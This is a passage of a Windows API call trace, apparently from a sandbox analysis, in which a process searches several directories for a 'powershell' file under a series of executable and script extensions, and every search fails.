	[0872.489] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0872.498] SetErrorMode (uMode=0x1) returned 0x1
	[0872.499] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0872.499] SetErrorMode (uMode=0x1) returned 0x1
	[0872.499] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0872.510] SetErrorMode (uMode=0x1) returned 0x1
	[0873.442] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0873.443] SetErrorMode (uMode=0x1) returned 0x1
	[0873.443] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0874.509] SetErrorMode (uMode=0x1) returned 0x1
	[0874.510] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0874.510] SetErrorMode (uMode=0x1) returned 0x1
	[0874.510] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0874.519] SetErrorMode (uMode=0x1) returned 0x1
	[0874.520] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0874.520] SetErrorMode (uMode=0x1) returned 0x1
	[0874.521] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0874.604] SetErrorMode (uMode=0x1) returned 0x1
	[0874.605] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0874.605] SetErrorMode (uMode=0x1) returned 0x1
	[0874.605] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0874.614] SetErrorMode (uMode=0x1) returned 0x1
	[0874.615] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0874.615] SetErrorMode (uMode=0x1) returned 0x1
	[0874.615] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0875.251] SetErrorMode (uMode=0x1) returned 0x1
	[0875.252] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0875.252] SetErrorMode (uMode=0x1) returned 0x1
	[0875.252] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0875.261] SetErrorMode (uMode=0x1) returned 0x1
	[0875.262] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0875.262] SetErrorMode (uMode=0x1) returned 0x1
	[0875.262] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0875.998] SetErrorMode (uMode=0x1) returned 0x1
	[0876.000] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0876.000] SetErrorMode (uMode=0x1) returned 0x1
	[0876.000] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.717] SetErrorMode (uMode=0x1) returned 0x1
	[0876.718] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0876.718] SetErrorMode (uMode=0x1) returned 0x1
	[0876.718] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.728] SetErrorMode (uMode=0x1) returned 0x1
	[0876.729] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0876.729] SetErrorMode (uMode=0x1) returned 0x1
	[0876.730] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.180] SetErrorMode (uMode=0x1) returned 0x1
	[0877.181] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0877.181] SetErrorMode (uMode=0x1) returned 0x1
	[0877.182] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.197] SetErrorMode (uMode=0x1) returned 0x1
	[0877.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0877.198] SetErrorMode (uMode=0x1) returned 0x1
	[0877.199] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.199] SetErrorMode (uMode=0x1) returned 0x1
	[0877.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0877.199] SetErrorMode (uMode=0x1) returned 0x1
	[0877.200] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.200] SetErrorMode (uMode=0x1) returned 0x1
	[0877.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0877.200] SetErrorMode (uMode=0x1) returned 0x1
	[0877.200] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.201] SetErrorMode (uMode=0x1) returned 0x1
	[0877.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0877.201] SetErrorMode (uMode=0x1) returned 0x1
	[0877.201] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.201] SetErrorMode (uMode=0x1) returned 0x1
	[0877.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0877.202] SetErrorMode (uMode=0x1) returned 0x1
	[0877.202] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.202] SetErrorMode (uMode=0x1) returned 0x1
	[0877.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0877.202] SetErrorMode (uMode=0x1) returned 0x1
	[0877.203] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.203] SetErrorMode (uMode=0x1) returned 0x1
	[0877.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0877.203] SetErrorMode (uMode=0x1) returned 0x1
	[0877.204] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.204] SetErrorMode (uMode=0x1) returned 0x1
	[0877.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0877.204] SetErrorMode (uMode=0x1) returned 0x1
	[0877.204] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.205] SetErrorMode (uMode=0x1) returned 0x1
	[0877.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0877.205] SetErrorMode (uMode=0x1) returned 0x1
	[0877.205] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.205] SetErrorMode (uMode=0x1) returned 0x1
	[0877.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0877.206] SetErrorMode (uMode=0x1) returned 0x1
	[0877.206] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.206] SetErrorMode (uMode=0x1) returned 0x1
	[0877.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0877.206] SetErrorMode (uMode=0x1) returned 0x1
	[0877.206] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.207] SetErrorMode (uMode=0x1) returned 0x1
	[0877.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0877.207] SetErrorMode (uMode=0x1) returned 0x1
	[0877.207] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.207] SetErrorMode (uMode=0x1) returned 0x1
	[0877.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0877.208] SetErrorMode (uMode=0x1) returned 0x1
	[0877.208] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.208] SetErrorMode (uMode=0x1) returned 0x1
	[0877.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0877.208] SetErrorMode (uMode=0x1) returned 0x1
	[0877.209] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.209] SetErrorMode (uMode=0x1) returned 0x1
	[0877.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0877.209] SetErrorMode (uMode=0x1) returned 0x1
	[0877.209] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.210] SetErrorMode (uMode=0x1) returned 0x1
	[0877.210] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0877.210] SetErrorMode (uMode=0x1) returned 0x1
	[0877.210] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.210] SetErrorMode (uMode=0x1) returned 0x1
